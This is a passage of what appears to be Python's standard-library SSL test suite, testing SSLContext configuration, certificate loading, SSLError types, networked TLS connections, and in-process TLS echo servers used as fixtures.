    @unittest.skipUnless(ssl.HAS_ECDH, "ECDH disabled on this OpenSSL build")
    def test_set_ecdh_curve(self):
        # Curve names are accepted as str or bytes; unknown names raise
        # ValueError, missing/None arguments raise TypeError.
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        ctx.set_ecdh_curve("prime256v1")
        ctx.set_ecdh_curve(b"prime256v1")
        self.assertRaises(TypeError, ctx.set_ecdh_curve)
        self.assertRaises(TypeError, ctx.set_ecdh_curve, None)
        self.assertRaises(ValueError, ctx.set_ecdh_curve, "foo")
        self.assertRaises(ValueError, ctx.set_ecdh_curve, b"foo")

    @needs_sni
    def test_sni_callback(self):
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)

        # set_servername_callback expects a callable, or None
        self.assertRaises(TypeError, ctx.set_servername_callback)
        self.assertRaises(TypeError, ctx.set_servername_callback, 4)
        self.assertRaises(TypeError, ctx.set_servername_callback, "")
        self.assertRaises(TypeError, ctx.set_servername_callback, ctx)

        def dummycallback(sock, servername, ctx):
            pass
        ctx.set_servername_callback(None)
        ctx.set_servername_callback(dummycallback)

    @needs_sni
    def test_sni_callback_refcycle(self):
        # Reference cycles through the servername callback are detected
        # and cleared.
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        # The default argument creates a cycle: callback -> ctx -> callback.
        def dummycallback(sock, servername, ctx, cycle=ctx):
            pass
        ctx.set_servername_callback(dummycallback)
        wr = weakref.ref(ctx)
        del ctx, dummycallback
        gc.collect()
        # The GC must be able to collect the context despite the cycle.
        self.assertIs(wr(), None)

    def test_cert_store_stats(self):
        # load_cert_chain() must not populate the verification store;
        # only load_verify_locations() does.
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        self.assertEqual(ctx.cert_store_stats(),
                         {'x509_ca': 0, 'crl': 0, 'x509': 0})
        ctx.load_cert_chain(CERTFILE)
        self.assertEqual(ctx.cert_store_stats(),
                         {'x509_ca': 0, 'crl': 0, 'x509': 0})
        ctx.load_verify_locations(CERTFILE)
        self.assertEqual(ctx.cert_store_stats(),
                         {'x509_ca': 0, 'crl': 0, 'x509': 1})
        ctx.load_verify_locations(CAFILE_CACERT)
        self.assertEqual(ctx.cert_store_stats(),
                         {'x509_ca': 1, 'crl': 0, 'x509': 2})

    def test_get_ca_certs(self):
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        self.assertEqual(ctx.get_ca_certs(), [])
        # CERTFILE is not flagged as X509v3 Basic Constraints: CA:TRUE
        ctx.load_verify_locations(CERTFILE)
        self.assertEqual(ctx.get_ca_certs(), [])
        # but CAFILE_CACERT is a CA cert
        ctx.load_verify_locations(CAFILE_CACERT)
        self.assertEqual(ctx.get_ca_certs(),
            [{'issuer': ((('organizationName', 'Root CA'),),
                         (('organizationalUnitName', 'http://www.cacert.org'),),
                         (('commonName', 'CA Cert Signing Authority'),),
                         (('emailAddress', 'support@cacert.org'),)),
              'notAfter': asn1time('Mar 29 12:29:49 2033 GMT'),
              'notBefore': asn1time('Mar 30 12:29:49 2003 GMT'),
              'serialNumber': '00',
              'crlDistributionPoints': ('https://www.cacert.org/revoke.crl',),
              'subject': ((('organizationName', 'Root CA'),),
                          (('organizationalUnitName', 'http://www.cacert.org'),),
                          (('commonName', 'CA Cert Signing Authority'),),
                          (('emailAddress', 'support@cacert.org'),)),
              'version': 3}])

        # get_ca_certs(True) returns the DER form.
        with open(CAFILE_CACERT) as f:
            pem = f.read()
        der = ssl.PEM_cert_to_DER_cert(pem)
        self.assertEqual(ctx.get_ca_certs(True), [der])

    def test_load_default_certs(self):
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        ctx.load_default_certs()

        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        ctx.load_default_certs(ssl.Purpose.SERVER_AUTH)
        ctx.load_default_certs()

        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        ctx.load_default_certs(ssl.Purpose.CLIENT_AUTH)

        # purpose must be a Purpose member, not None or a plain string
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        self.assertRaises(TypeError, ctx.load_default_certs, None)
        self.assertRaises(TypeError, ctx.load_default_certs, 'SERVER_AUTH')

    @unittest.skipIf(sys.platform == "win32", "not-Windows specific")
    def test_load_default_certs_env(self):
        # SSL_CERT_DIR/SSL_CERT_FILE environment variables control which
        # default certificates get loaded (non-Windows code path).
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        with support.EnvironmentVarGuard() as env:
            env["SSL_CERT_DIR"] = CAPATH
            env["SSL_CERT_FILE"] = CERTFILE
            ctx.load_default_certs()
            self.assertEqual(ctx.cert_store_stats(),
                             {"crl": 0, "x509": 1, "x509_ca": 0})

    @unittest.skipUnless(sys.platform == "win32", "Windows specific")
    def test_load_default_certs_env_windows(self):
        # On Windows the env vars add to the system store contents.
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        ctx.load_default_certs()
        stats = ctx.cert_store_stats()

        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        with support.EnvironmentVarGuard() as env:
            env["SSL_CERT_DIR"] = CAPATH
            env["SSL_CERT_FILE"] = CERTFILE
            ctx.load_default_certs()
            stats["x509"] += 1
            self.assertEqual(ctx.cert_store_stats(), stats)

    def test_create_default_context(self):
        # Default (SERVER_AUTH) purpose: CERT_REQUIRED + check_hostname.
        ctx = ssl.create_default_context()
        self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
        self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
        self.assertTrue(ctx.check_hostname)
        self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
        self.assertEqual(
            ctx.options & getattr(ssl, "OP_NO_COMPRESSION", 0),
            getattr(ssl, "OP_NO_COMPRESSION", 0),
        )

        with open(SIGNING_CA) as f:
            cadata = f.read().decode("ascii")
        ctx = ssl.create_default_context(cafile=SIGNING_CA, capath=CAPATH,
                                         cadata=cadata)
        self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
        self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
        self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
        self.assertEqual(
            ctx.options & getattr(ssl, "OP_NO_COMPRESSION", 0),
            getattr(ssl, "OP_NO_COMPRESSION", 0),
        )

        # CLIENT_AUTH purpose: CERT_NONE, plus single-use DH/ECDH keys.
        ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
        self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
        self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
        self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
        self.assertEqual(
            ctx.options & getattr(ssl, "OP_NO_COMPRESSION", 0),
            getattr(ssl, "OP_NO_COMPRESSION", 0),
        )
        self.assertEqual(
            ctx.options & getattr(ssl, "OP_SINGLE_DH_USE", 0),
            getattr(ssl, "OP_SINGLE_DH_USE", 0),
        )
        self.assertEqual(
            ctx.options & getattr(ssl, "OP_SINGLE_ECDH_USE", 0),
            getattr(ssl, "OP_SINGLE_ECDH_USE", 0),
        )

    def test__create_stdlib_context(self):
        # The stdlib-internal context factory defaults to CERT_NONE and
        # no hostname checking.
        ctx = ssl._create_stdlib_context()
        self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
        self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
        self.assertFalse(ctx.check_hostname)
        self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)

        ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1)
        self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
        self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
        self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)

        ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1,
                                         cert_reqs=ssl.CERT_REQUIRED,
                                         check_hostname=True)
        self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
        self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
        self.assertTrue(ctx.check_hostname)
        self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)

        ctx = ssl._create_stdlib_context(purpose=ssl.Purpose.CLIENT_AUTH)
        self.assertEqual(ctx.protocol, ssl.PROTOCOL_SSLv23)
        self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
        self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)

    def test_check_hostname(self):
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        self.assertFalse(ctx.check_hostname)

        # Requires CERT_REQUIRED or CERT_OPTIONAL
        with self.assertRaises(ValueError):
            ctx.check_hostname = True
        ctx.verify_mode = ssl.CERT_REQUIRED
        self.assertFalse(ctx.check_hostname)
        ctx.check_hostname = True
        self.assertTrue(ctx.check_hostname)

        ctx.verify_mode = ssl.CERT_OPTIONAL
        ctx.check_hostname = True
        self.assertTrue(ctx.check_hostname)

        # Cannot set CERT_NONE with check_hostname enabled
        with self.assertRaises(ValueError):
            ctx.verify_mode = ssl.CERT_NONE
        ctx.check_hostname = False
        self.assertFalse(ctx.check_hostname)


class SSLErrorTests(unittest.TestCase):
    # Tests for the SSLError exception type and its subclasses.

    def test_str(self):
        # The str() of a SSLError doesn't include the errno
        e = ssl.SSLError(1, "foo")
        self.assertEqual(str(e), "foo")
        self.assertEqual(e.errno, 1)
        # Same for a subclass
        e = ssl.SSLZeroReturnError(1, "foo")
        self.assertEqual(str(e), "foo")
        self.assertEqual(e.errno, 1)

    def test_lib_reason(self):
        # Test the library and reason attributes
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        with self.assertRaises(ssl.SSLError) as cm:
            ctx.load_dh_params(CERTFILE)
        self.assertEqual(cm.exception.library, 'PEM')
        self.assertEqual(cm.exception.reason, 'NO_START_LINE')
        s = str(cm.exception)
        self.assertTrue(s.startswith("[PEM: NO_START_LINE] no start line"), s)

    def test_subclass(self):
        # Check that the appropriate SSLError subclass is raised
        # (this only tests one of them)
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        with closing(socket.socket()) as s:
            s.bind(("127.0.0.1", 0))
            s.listen(5)
            c = socket.socket()
            c.connect(s.getsockname())
            c.setblocking(False)
            # Handshake against a non-TLS listener cannot complete, so a
            # non-blocking do_handshake() must raise SSLWantReadError.
            with closing(ctx.wrap_socket(c, False, do_handshake_on_connect=False)) as c:
                with self.assertRaises(ssl.SSLWantReadError) as cm:
                    c.do_handshake()
                s = str(cm.exception)
                self.assertTrue(s.startswith("The operation did not complete (read)"), s)
                # For compatibility
                self.assertEqual(cm.exception.errno, ssl.SSL_ERROR_WANT_READ)


class NetworkedTests(unittest.TestCase):
    # Tests that require real network access to REMOTE_HOST.

    def test_connect(self):
        with support.transient_internet(REMOTE_HOST):
            s = ssl.wrap_socket(socket.socket(socket.AF_INET),
                                cert_reqs=ssl.CERT_NONE)
            try:
                s.connect((REMOTE_HOST, 443))
                self.assertEqual({}, s.getpeercert())
            finally:
                s.close()
            # this should fail because we have no verification certs
            s = ssl.wrap_socket(socket.socket(socket.AF_INET),
                                cert_reqs=ssl.CERT_REQUIRED)
            self.assertRaisesRegexp(ssl.SSLError, "certificate verify failed",
                                    s.connect, (REMOTE_HOST, 443))
            s.close()
            # this should succeed because we specify the root cert
            s = ssl.wrap_socket(socket.socket(socket.AF_INET),
                                cert_reqs=ssl.CERT_REQUIRED,
                                ca_certs=REMOTE_ROOT_CERT)
            try:
                s.connect((REMOTE_HOST, 443))
                self.assertTrue(s.getpeercert())
            finally:
                s.close()

    def test_connect_ex(self):
        # Issue #11326: check connect_ex() implementation
        with support.transient_internet(REMOTE_HOST):
            s = ssl.wrap_socket(socket.socket(socket.AF_INET),
                                cert_reqs=ssl.CERT_REQUIRED,
                                ca_certs=REMOTE_ROOT_CERT)
            try:
                self.assertEqual(0, s.connect_ex((REMOTE_HOST, 443)))
                self.assertTrue(s.getpeercert())
            finally:
                s.close()

    def test_non_blocking_connect_ex(self):
        # Issue #11326: non-blocking connect_ex() should allow handshake
        # to proceed after the socket gets ready.
        with support.transient_internet(REMOTE_HOST):
            s = ssl.wrap_socket(socket.socket(socket.AF_INET),
                                cert_reqs=ssl.CERT_REQUIRED,
                                ca_certs=REMOTE_ROOT_CERT,
                                do_handshake_on_connect=False)
            try:
                s.setblocking(False)
                rc = s.connect_ex((REMOTE_HOST, 443))
                # EWOULDBLOCK under Windows, EINPROGRESS elsewhere
                self.assertIn(rc, (0, errno.EINPROGRESS, errno.EWOULDBLOCK))
                # Wait for connect to finish
                select.select([], [s], [], 5.0)
                # Non-blocking handshake
                while True:
                    try:
                        s.do_handshake()
                        break
                    except ssl.SSLWantReadError:
                        select.select([s], [], [], 5.0)
                    except ssl.SSLWantWriteError:
                        select.select([], [s], [], 5.0)
                # SSL established
                self.assertTrue(s.getpeercert())
            finally:
                s.close()

    def test_timeout_connect_ex(self):
        # Issue #12065: on a timeout, connect_ex() should return the original
        # errno (mimicking the behaviour of non-SSL sockets).
        with support.transient_internet(REMOTE_HOST):
            s = ssl.wrap_socket(socket.socket(socket.AF_INET),
                                cert_reqs=ssl.CERT_REQUIRED,
                                ca_certs=REMOTE_ROOT_CERT,
                                do_handshake_on_connect=False)
            try:
                # A near-zero timeout should surface EAGAIN/EWOULDBLOCK.
                s.settimeout(0.0000001)
                rc = s.connect_ex((REMOTE_HOST, 443))
                if rc == 0:
                    self.skipTest("REMOTE_HOST responded too quickly")
                self.assertIn(rc, (errno.EAGAIN, errno.EWOULDBLOCK))
            finally:
                s.close()

    def test_connect_ex_error(self):
        with support.transient_internet(REMOTE_HOST):
            s = ssl.wrap_socket(socket.socket(socket.AF_INET),
                                cert_reqs=ssl.CERT_REQUIRED,
                                ca_certs=REMOTE_ROOT_CERT)
            try:
                # Port 444 is assumed closed on the remote host.
                rc = s.connect_ex((REMOTE_HOST, 444))
                # Issue #19919: Windows machines or VMs hosted on Windows
                # machines sometimes return EWOULDBLOCK.
                errors = (
                    errno.ECONNREFUSED, errno.EHOSTUNREACH, errno.ETIMEDOUT,
                    errno.EWOULDBLOCK,
                )
                self.assertIn(rc, errors)
            finally:
                s.close()

    def test_connect_with_context(self):
        with support.transient_internet(REMOTE_HOST):
            # Same as test_connect, but with a separately created context
            ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
            s = ctx.wrap_socket(socket.socket(socket.AF_INET))
            s.connect((REMOTE_HOST, 443))
            try:
                self.assertEqual({}, s.getpeercert())
            finally:
                s.close()
            # Same with a server hostname
            s = ctx.wrap_socket(socket.socket(socket.AF_INET),
                                server_hostname=REMOTE_HOST)
            s.connect((REMOTE_HOST, 443))
            s.close()
            # This should fail because we have no verification certs
            ctx.verify_mode = ssl.CERT_REQUIRED
            s = ctx.wrap_socket(socket.socket(socket.AF_INET))
            self.assertRaisesRegexp(ssl.SSLError, "certificate verify failed",
                                    s.connect, (REMOTE_HOST, 443))
            s.close()
            # This should succeed because we specify the root cert
            ctx.load_verify_locations(REMOTE_ROOT_CERT)
            s = ctx.wrap_socket(socket.socket(socket.AF_INET))
            s.connect((REMOTE_HOST, 443))
            try:
                cert = s.getpeercert()
                self.assertTrue(cert)
            finally:
                s.close()

    def test_connect_capath(self):
        # Verify server certificates using the `capath` argument
        # NOTE: the subject hashing algorithm has been changed between
        # OpenSSL 0.9.8n and 1.0.0, as a result the capath directory must
        # contain both versions of each certificate (same content, different
        # filename) for this test to be portable across OpenSSL releases.
        with support.transient_internet(REMOTE_HOST):
            ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
            ctx.verify_mode = ssl.CERT_REQUIRED
            ctx.load_verify_locations(capath=CAPATH)
            s = ctx.wrap_socket(socket.socket(socket.AF_INET))
            s.connect((REMOTE_HOST, 443))
            try:
                cert = s.getpeercert()
                self.assertTrue(cert)
            finally:
                s.close()
            # Same with a bytes `capath` argument
            ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
            ctx.verify_mode = ssl.CERT_REQUIRED
            ctx.load_verify_locations(capath=BYTES_CAPATH)
            s = ctx.wrap_socket(socket.socket(socket.AF_INET))
            s.connect((REMOTE_HOST, 443))
            try:
                cert = s.getpeercert()
                self.assertTrue(cert)
            finally:
                s.close()

    def test_connect_cadata(self):
        # Verify the peer using in-memory CA data, in PEM and DER form.
        with open(REMOTE_ROOT_CERT) as f:
            pem = f.read().decode('ascii')
        der = ssl.PEM_cert_to_DER_cert(pem)
        with support.transient_internet(REMOTE_HOST):
            ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
            ctx.verify_mode = ssl.CERT_REQUIRED
            ctx.load_verify_locations(cadata=pem)
            with closing(ctx.wrap_socket(socket.socket(socket.AF_INET))) as s:
                s.connect((REMOTE_HOST, 443))
                cert = s.getpeercert()
                self.assertTrue(cert)

            # same with DER
            ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
            ctx.verify_mode = ssl.CERT_REQUIRED
            ctx.load_verify_locations(cadata=der)
            with closing(ctx.wrap_socket(socket.socket(socket.AF_INET))) as s:
                s.connect((REMOTE_HOST, 443))
                cert = s.getpeercert()
                self.assertTrue(cert)

    @unittest.skipIf(os.name == "nt", "Can't use a socket as a file under Windows")
    def test_makefile_close(self):
        # Issue #5238: creating a file-like object with makefile() shouldn't
        # delay closing the underlying "real socket" (here tested with its
        # file descriptor, hence skipping the test under Windows).
        with support.transient_internet(REMOTE_HOST):
            ss = ssl.wrap_socket(socket.socket(socket.AF_INET))
            ss.connect((REMOTE_HOST, 443))
            fd = ss.fileno()
            f = ss.makefile()
            f.close()
            # The fd is still open
            os.read(fd, 0)
            # Closing the SSL socket should close the fd too
            ss.close()
            gc.collect()
            with self.assertRaises(OSError) as e:
                os.read(fd, 0)
            self.assertEqual(e.exception.errno, errno.EBADF)

    def test_non_blocking_handshake(self):
        # Drive the handshake manually on a non-blocking socket, using
        # select() to wait between SSLWantRead/WriteError retries.
        with support.transient_internet(REMOTE_HOST):
            s = socket.socket(socket.AF_INET)
            s.connect((REMOTE_HOST, 443))
            s.setblocking(False)
            s = ssl.wrap_socket(s,
                                cert_reqs=ssl.CERT_NONE,
                                do_handshake_on_connect=False)
            count = 0
            while True:
                try:
                    count += 1
                    s.do_handshake()
                    break
                except ssl.SSLWantReadError:
                    select.select([s], [], [])
                except ssl.SSLWantWriteError:
                    select.select([], [s], [])
            s.close()
            if support.verbose:
                sys.stdout.write("\nNeeded %d calls to do_handshake() to establish session.\n" % count)

    def test_get_server_certificate(self):
        def _test_get_server_certificate(host, port, cert=None):
            # Fetch the peer certificate: no CA succeeds, the wrong CA
            # (CERTFILE) fails, and the matching CA succeeds again.
            with support.transient_internet(host):
                pem = ssl.get_server_certificate((host, port))
                if not pem:
                    self.fail("No server certificate on %s:%s!" % (host, port))

                try:
                    pem = ssl.get_server_certificate((host, port),
                                                     ca_certs=CERTFILE)
                except ssl.SSLError as x:
                    #should fail
                    if support.verbose:
                        sys.stdout.write("%s\n" % x)
                else:
                    self.fail("Got server certificate %s for %s:%s!" % (pem, host, port))

                pem = ssl.get_server_certificate((host, port),
                                                 ca_certs=cert)
                if not pem:
                    self.fail("No server certificate on %s:%s!" % (host, port))
                if support.verbose:
                    sys.stdout.write("\nVerified certificate for %s:%s is\n%s\n" % (host, port ,pem))

        _test_get_server_certificate(REMOTE_HOST, 443, REMOTE_ROOT_CERT)
        if support.IPV6_ENABLED:
            _test_get_server_certificate('ipv6.google.com', 443)

    def test_ciphers(self):
        remote = (REMOTE_HOST, 443)
        with support.transient_internet(remote[0]):
            with closing(ssl.wrap_socket(socket.socket(socket.AF_INET),
                                         cert_reqs=ssl.CERT_NONE, ciphers="ALL")) as s:
                s.connect(remote)
            with closing(ssl.wrap_socket(socket.socket(socket.AF_INET),
                                         cert_reqs=ssl.CERT_NONE, ciphers="DEFAULT")) as s:
                s.connect(remote)
            # Error checking can happen at instantiation or when connecting
            with self.assertRaisesRegexp(ssl.SSLError, "No cipher can be selected"):
                with closing(socket.socket(socket.AF_INET)) as sock:
                    s = ssl.wrap_socket(sock,
                                        cert_reqs=ssl.CERT_NONE, ciphers="^$:,;?*'dorothyx")
                    s.connect(remote)

    def test_algorithms(self):
        # Issue #8484: all algorithms should be available when verifying a
        # certificate.
# SHA256 was added in OpenSSL 0.9.8 if ssl.OPENSSL_VERSION_INFO < (0, 9, 8, 0, 15): self.skipTest("SHA256 not available on %r" % ssl.OPENSSL_VERSION) # sha256.tbs-internet.com needs SNI to use the correct certificate if not ssl.HAS_SNI: self.skipTest("SNI needed for this test") # https://sha2.hboeck.de/ was used until 2011-01-08 (no route to host) remote = ("sha256.tbs-internet.com", 443) sha256_cert = os.path.join(os.path.dirname(__file__), "sha256.pem") with support.transient_internet("sha256.tbs-internet.com"): ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1) ctx.verify_mode = ssl.CERT_REQUIRED ctx.load_verify_locations(sha256_cert) s = ctx.wrap_socket(socket.socket(socket.AF_INET), server_hostname="sha256.tbs-internet.com") try: s.connect(remote) if support.verbose: sys.stdout.write("\nCipher with %r is %r\n" % (remote, s.cipher())) sys.stdout.write("Certificate is:\n%s\n" % pprint.pformat(s.getpeercert())) finally: s.close() def test_get_ca_certs_capath(self): # capath certs are loaded on request with support.transient_internet(REMOTE_HOST): ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23) ctx.verify_mode = ssl.CERT_REQUIRED ctx.load_verify_locations(capath=CAPATH) self.assertEqual(ctx.get_ca_certs(), []) s = ctx.wrap_socket(socket.socket(socket.AF_INET)) s.connect((REMOTE_HOST, 443)) try: cert = s.getpeercert() self.assertTrue(cert) finally: s.close() self.assertEqual(len(ctx.get_ca_certs()), 1) @needs_sni def test_context_setget(self): # Check that the context of a connected socket can be replaced. 
        with support.transient_internet(REMOTE_HOST):
            ctx1 = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
            ctx2 = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
            s = socket.socket(socket.AF_INET)
            with closing(ctx1.wrap_socket(s)) as ss:
                ss.connect((REMOTE_HOST, 443))
                self.assertIs(ss.context, ctx1)
                self.assertIs(ss._sslobj.context, ctx1)
                ss.context = ctx2
                self.assertIs(ss.context, ctx2)
                self.assertIs(ss._sslobj.context, ctx2)


# The threaded server/client tests below only exist when the threading
# module is available; _have_threads records that for the test driver.
try:
    import threading
except ImportError:
    _have_threads = False
else:
    _have_threads = True

    from test.ssl_servers import make_https_server

    class ThreadedEchoServer(threading.Thread):
        # An in-process TLS echo server used by the local connection tests.

        class ConnectionHandler(threading.Thread):

            """A mildly complicated class, because we want it to work both
            with and without the SSL wrapper around the socket connection, so
            that we can test the STARTTLS functionality."""

            def __init__(self, server, connsock, addr):
                self.server = server
                self.running = False
                self.sock = connsock
                self.addr = addr
                self.sock.setblocking(1)
                self.sslconn = None
                threading.Thread.__init__(self)
                self.daemon = True

            def wrap_conn(self):
                # Wrap the accepted plain socket with TLS; record the
                # negotiated NPN/ALPN protocols on the server object.
                try:
                    self.sslconn = self.server.context.wrap_socket(
                        self.sock, server_side=True)
                    self.server.selected_npn_protocols.append(self.sslconn.selected_npn_protocol())
                    self.server.selected_alpn_protocols.append(self.sslconn.selected_alpn_protocol())
                except socket.error as e:
                    # We treat ConnectionResetError as though it were an
                    # SSLError - OpenSSL on Ubuntu abruptly closes the
                    # connection when asked to use an unsupported protocol.
                    #
                    # XXX Various errors can have happened here, for example
                    # a mismatching protocol version, an invalid certificate,
                    # or a low-level bug. This should be made more discriminating.
                    if not isinstance(e, ssl.SSLError) and e.errno != errno.ECONNRESET:
                        raise
                    self.server.conn_errors.append(e)
                    if self.server.chatty:
                        handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
                    self.running = False
                    self.server.stop()
                    self.close()
                    return False
                else:
                    if self.server.context.verify_mode == ssl.CERT_REQUIRED:
                        cert = self.sslconn.getpeercert()
                        if support.verbose and self.server.chatty:
                            sys.stdout.write(" client cert is " + pprint.pformat(cert) + "\n")
                        cert_binary = self.sslconn.getpeercert(True)
                        if support.verbose and self.server.chatty:
                            sys.stdout.write(" cert binary is " + str(len(cert_binary)) + " bytes\n")
                    cipher = self.sslconn.cipher()
                    if support.verbose and self.server.chatty:
                        sys.stdout.write(" server: connection cipher is now " + str(cipher) + "\n")
                        sys.stdout.write(" server: selected protocol is now "
                                         + str(self.sslconn.selected_npn_protocol()) + "\n")
                    return True

            def read(self):
                # Read from the TLS connection if wrapped, else the raw socket.
                if self.sslconn:
                    return self.sslconn.read()
                else:
                    return self.sock.recv(1024)

            def write(self, bytes):
                # Mirror of read(): TLS write when wrapped, raw send otherwise.
                if self.sslconn:
                    return self.sslconn.write(bytes)
                else:
                    return self.sock.send(bytes)

            def close(self):
                if self.sslconn:
                    self.sslconn.close()
                else:
                    self.sock.close()

            def run(self):
                # Echo loop; understands the control messages 'over',
                # 'STARTTLS', 'ENDTLS' and 'CB tls-unique'.
                self.running = True
                if not self.server.starttls_server:
                    if not self.wrap_conn():
                        return
                while self.running:
                    try:
                        msg = self.read()
                        stripped = msg.strip()
                        if not stripped:
                            # eof, so quit this handler
                            self.running = False
                            self.close()
                        elif stripped == b'over':
                            if support.verbose and self.server.connectionchatty:
                                sys.stdout.write(" server: client closed connection\n")
                            self.close()
                            return
                        elif (self.server.starttls_server and
                              stripped == b'STARTTLS'):
                            if support.verbose and self.server.connectionchatty:
                                sys.stdout.write(" server: read STARTTLS from client, sending OK...\n")
                            self.write(b"OK\n")
                            if not self.wrap_conn():
                                return
                        elif (self.server.starttls_server and self.sslconn
                              and stripped == b'ENDTLS'):
                            if support.verbose and self.server.connectionchatty:
                                sys.stdout.write(" server: read ENDTLS from client, sending OK...\n")
                            self.write(b"OK\n")
                            self.sock = self.sslconn.unwrap()
                            self.sslconn = None
                            if support.verbose and self.server.connectionchatty:
                                sys.stdout.write(" server: connection is now unencrypted...\n")
                        elif stripped == b'CB tls-unique':
                            if support.verbose and self.server.connectionchatty:
                                sys.stdout.write(" server: read CB tls-unique from client, sending our CB data...\n")
                            data = self.sslconn.get_channel_binding("tls-unique")
                            self.write(repr(data).encode("us-ascii") + b"\n")
                        else:
                            if (support.verbose and
                                self.server.connectionchatty):
                                ctype = (self.sslconn and "encrypted") or "unencrypted"
                                sys.stdout.write(" server: read %r (%s), sending back %r (%s)...\n"
                                                 % (msg, ctype, msg.lower(), ctype))
                            self.write(msg.lower())
                    except ssl.SSLError:
                        if self.server.chatty:
                            handle_error("Test server failure:\n")
                        self.close()
                        self.running = False
                        # normally, we'd just stop here, but for the test
                        # harness, we want to stop the server
                        self.server.stop()

        def __init__(self, certificate=None, ssl_version=None,
                     certreqs=None, cacerts=None,
                     chatty=True, connectionchatty=False, starttls_server=False,
                     npn_protocols=None, alpn_protocols=None,
                     ciphers=None, context=None):
            # Either adopt a ready-made context, or build one from the
            # individual certificate/verification/protocol arguments.
            if context:
                self.context = context
            else:
                self.context = ssl.SSLContext(ssl_version
                                              if ssl_version is not None
                                              else ssl.PROTOCOL_TLSv1)
                self.context.verify_mode = (certreqs if certreqs is not None
                                            else ssl.CERT_NONE)
                if cacerts:
                    self.context.load_verify_locations(cacerts)
                if certificate:
                    self.context.load_cert_chain(certificate)
                if npn_protocols:
                    self.context.set_npn_protocols(npn_protocols)
                if alpn_protocols:
                    self.context.set_alpn_protocols(alpn_protocols)
                if ciphers:
                    self.context.set_ciphers(ciphers)
            self.chatty = chatty
            self.connectionchatty = connectionchatty
            self.starttls_server = starttls_server
            self.sock = socket.socket()
            self.port = support.bind_port(self.sock)
            self.flag = None
            self.active = False
            self.selected_npn_protocols = []
            self.selected_alpn_protocols = []
self.conn_errors = [] threading.Thread.__init__(self) self.daemon = True def __enter__(self): self.start(threading.Event()) self.flag.wait() return self def __exit__(self, *args): self.stop() self.join() def start(self, flag=None): self.flag = flag threading.Thread.start(self) def run(self): self.sock.settimeout(0.05) self.sock.listen(5) self.active = True if self.flag: # signal an event self.flag.set() while self.active: try: newconn, connaddr = self.sock.accept() if support.verbose and self.chatty: sys.stdout.write(' server: new connection from ' + repr(connaddr) + '\n') handler = self.ConnectionHandler(self, newconn, connaddr) handler.start() handler.join() except socket.timeout: pass except KeyboardInterrupt: self.stop() self.sock.close() def stop(self): self.active = False class AsyncoreEchoServer(threading.Thread): class EchoServer(asyncore.dispatcher): class ConnectionHandler(asyncore.dispatcher_with_send): def __init__(self, conn, certfile): self.socket = ssl.wrap_socket(conn, server_side=True, certfile=certfile, do_handshake_on_connect=False) asyncore.dispatcher_with_send.__init__(self, self.socket) self._ssl_accepting = True self._do_ssl_handshake() def readable(self): if isinstance(self.socket, ssl.SSLSocket): while self.socket.pending() > 0: self.handle_read_event() return True def _do_ssl_handshake(self): try: self.socket.do_handshake() except (ssl.SSLWantReadError, ssl.SSLWantWriteError): return except ssl.SSLEOFError: return self.handle_close() except ssl.SSLError: raise except socket.error, err: if err.args[0] == errno.ECONNABORTED: return self.handle_close() else: self._ssl_accepting = False def handle_read(self): if self._ssl_accepting: self._do_ssl_handshake() else: data = self.recv(1024) if support.verbose: sys.stdout.write(" server: read %s from client\n" % repr(data)) if not data: self.close() else: self.send(data.lower()) def handle_close(self): self.close() if support.verbose: sys.stdout.write(" server: closed connection %s\n" % self.socket) 
